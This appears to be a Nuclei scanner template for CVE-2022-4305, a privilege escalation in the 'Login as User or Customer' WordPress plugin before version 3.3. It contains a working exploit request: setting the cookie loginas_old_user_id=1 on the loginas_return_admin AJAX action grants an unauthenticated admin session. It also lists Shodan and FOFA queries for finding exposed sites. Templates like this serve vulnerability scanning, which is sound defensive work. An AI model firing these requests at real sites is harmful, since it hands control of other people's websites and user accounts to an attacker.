id: CVE-2022-4305

info:
  name: Login as User or Customer < 3.3 - Privilege Escalation
  author: r3Y3r53
  severity: critical
  description: |
    The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
  impact: |
    Unauthenticated attackers can obtain valid admin sessions by exploiting missing authorization checks in the Login as User or Customer plugin, potentially gaining complete control over the WordPress site and all user accounts.
  remediation: |
    Fixed in version 3.3
  reference:
    - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4305
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4305
    cwe-id: CWE-269
    epss-score: 0.83054
    epss-percentile: 0.99279
    cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-buy
    product: login_as_user_or_customer_\(user_switching\)
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user
    fofa-query: body=/wp-content/plugins/login-as-customer-or-user
    publicwww-query: /wp-content/plugins/login-as-customer-or-user
  tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
        Host: {{Hostname}}
        Cookie: loginas_old_user_id=1
      - |
        GET /wp-admin/users.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')
        condition: and
# digest: 4a0a0047304502205c0166da6655f47517f105fcea8fc12592d91502d2f5564036b6e8a7ad0ccae4022100d14635bc8e47a785e25e8730e238dc10da212a945e7a4d29da3eae3e8dd11042:922c64590222798bb761d5b6d8e72950